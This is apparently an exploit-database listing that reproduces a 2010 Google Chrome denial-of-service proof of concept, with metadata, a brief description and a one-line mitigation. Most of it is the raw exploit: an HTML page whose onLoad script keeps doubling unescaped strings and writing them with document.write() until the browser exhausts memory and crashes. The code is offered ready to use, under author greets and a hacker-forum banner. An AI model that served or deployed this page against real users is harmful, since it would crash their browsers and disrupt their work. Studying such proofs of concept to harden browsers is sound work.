header-logo
Suggest Exploit
vendor:
Chrome
by:
Prashant a.k.a t3rm!n4t0r
7.5
CVSS
HIGH
Denial Of Service (DoS)
400
CWE
Product Name: Chrome
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, *nix
2010

Google Chrome Denial Of Service (DoS)

This exploit is a Denial of Service (DoS) vulnerability in Google Chrome. It is caused by a memory exhaustion issue when a large number of unescaped strings are written to the document.write() function. This causes the browser to crash.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all strings are properly escaped before being written to the document.write() function.
Source

Exploit-DB raw data:

/* 

         GGGGGG\                                                   
	GG  __GG\                                                  
	GG /  \__| aaaaaa\   rrrrrr\  aaaaaa\   gggggg\   eeeeee\  
	GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\ 
	GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
	GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
	\GGGGGG  |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\ 
 	 \______/  \_______|\__|      \_______| \____gg | \_______|
                                       	       gg\   gg |          
                                       		gggggg  | 

Info-sec forum: http://garage4hackers.com

[+] Google Chrome Denial Of Service (DoS)

[+] Author: Prashant a.k.a t3rm!n4t0r

[+] C0ntact: happyterminator@gmail.com

[+] Platform: Windows, *nix

[+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

[+] Special Greets to: "vinnu" and secfence team

[+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r 

                      all hackers garage crew :)


*/


<html>
<title>DoS</title>
<head>
<script>
function Lox()
 {
 
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
     
    for(i=0; i <= 100 ; ++i) 
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }    
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="Lox()">
</body>
</html>

Navigation

Suggest Exploit

Services By CQR